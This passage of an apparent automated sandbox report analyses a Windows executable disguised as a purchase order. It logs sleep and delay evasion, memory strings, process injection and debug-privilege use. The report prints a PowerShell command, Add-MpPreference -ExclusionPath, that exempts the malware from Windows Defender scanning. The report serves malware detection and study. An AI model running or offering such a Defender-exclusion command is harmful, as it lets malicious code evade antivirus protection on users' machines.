                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -595860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -595735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -595610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -595485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -595359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -595250s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -595141s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -595031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -594922s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -594812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -594703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -594594s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -594469s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -594359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -594250s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -594141s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 599749Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 599589Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 599469Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 599359Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 599250Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 599141Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 599016Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 598891Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 598782Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 598657Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 598532Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 598422Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 598313Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 598188Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 598063Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 597938Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 597813Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 597594Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 597469Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 597247Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 597141Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 597031Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 596922Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 596813Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 596688Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 596578Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 596469Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 596344Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 595359Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 595250Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 595141Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 595031Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 594922Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 594812Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 594469Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 594359Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 594250Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 594141Jump to behavior
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8f06755b6c582a4<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8eac309876b74f9<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e4d54f02b11272
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8f9d2a4b86df79f<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8edf75bfeda9c26<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e42653cf03ef89
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8f1bb2cdc189bc3<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8f6540e0ac4c402<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8f2396214472603<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4177902239.00000000061C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8ec62573ca63491<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8ef5db3292f915b<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8ed82771ec7acd9<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8f2af6564bcba17<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8ed13f44211b99f<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8fa8d1df6635287<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e5d5f2dde2385f
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e6911d34a55386
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4177902239.00000000061C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWvW
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e9ce35743de2f0
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8ef96d403494b1c<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8ec0bc07cb4e305<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8f593e62d7f03f7<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8eb35ac2142ca3d<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e36cc08b3ad46e
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e3cd13e847c67a
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8f71f45874bf7b5<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e8a51f64ea9267
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8eba3c9ff184e47<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8f01d68365bec94<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8eccdc6050420b9<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8ee6229013bec1d<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8f35ef436ae6d2d<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e52f8f5ac7755b
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8f3a9d4c8e248d0<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e632bd227ff3ba
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e7a4c1c9b34190
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4166570008.0000000000B36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8ea396c74eead15
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e8178b7ce35ac3
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8eeee2af2d3a3ca<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e6f2b75e73a24c
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8f0dde8ee198a06<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e58dc8b6b5f7a8
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e95ead0e244faf
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8f466f70c923bcf<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e7cc13caf20e04
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e475edd6fc1fb4
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8f7e5b28c6459d0<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e90ddfd6da3a4a
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8f13f24147285bd<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e86e0b310870a6
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8e74931e771a4ac
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8f30807d3f43c07<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8f8ce9a52de3096<
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeMemory written: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess created: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"Jump to behavior
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXE
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXC
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxc
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxb
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXL
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXJ
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8*
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8(
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8&
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxf
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXF
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX3
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX2
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxP
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxO
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxN
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX.
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxX
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXd
